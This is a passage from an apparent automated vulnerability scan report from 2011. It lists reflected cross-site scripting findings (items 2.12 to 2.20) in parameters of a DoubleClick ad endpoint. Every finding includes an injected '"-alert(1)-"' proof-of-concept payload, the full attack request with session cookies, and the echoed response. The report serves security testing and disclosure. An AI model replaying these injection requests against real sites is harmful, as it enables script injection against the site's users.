GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=2075956a895"-alert(1)-"c9be2eb186c&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
00/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=2075956a895"-alert(1)-"c9be2eb186c&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/c
...[SNIP]...

2.12. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec34a"-alert(1)-"28d6349bcd5 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=ec34a"-alert(1)-"28d6349bcd5&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
log/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=ec34a"-alert(1)-"28d6349bcd5&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7
...[SNIP]...

2.13. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c739"-alert(1)-"9f1133c0075 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=1c739"-alert(1)-"9f1133c0075&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=1c739"-alert(1)-"9f1133c0075&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-
...[SNIP]...

2.14. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb27"-alert(1)-"f2620025354 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=bcb27"-alert(1)-"f2620025354&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
0422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=bcb27"-alert(1)-"f2620025354&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/sol
...[SNIP]...

2.15. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835f0"-alert(1)-"b57ef62ecd6 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=835f0"-alert(1)-"b57ef62ecd6&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=835f0"-alert(1)-"b57ef62ecd6&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW
...[SNIP]...

2.16. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c202"-alert(1)-"cae4b935fff was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=4c202"-alert(1)-"cae4b935fff HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7198
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:54 GMT
Expires: Thu, 12 May 2011 13:33:54 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
d=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=4c202"-alert(1)-"cae4b935fffhttp://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A");
var fscUrl = url;
...[SNIP]...

2.17. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb0b4"-alert(1)-"b2cfa13b6 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cncb0b4"-alert(1)-"b2cfa13b6&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7202

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
49/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cncb0b4"-alert(1)-"b2cfa13b6&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t
...[SNIP]...

2.18. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7930"-alert(1)-"94b55cfc87e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=e7930"-alert(1)-"94b55cfc87e&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=e7930"-alert(1)-"94b55cfc87e&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.1
...[SNIP]...

2.19. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb80b"-alert(1)-"2b1e9684f83 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616bb80b"-alert(1)-"2b1e9684f83&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
2874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616bb80b"-alert(1)-"2b1e9684f83&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http
...[SNIP]...

2.20. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f33e6"-alert(1)-"c79dbcd5ee was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

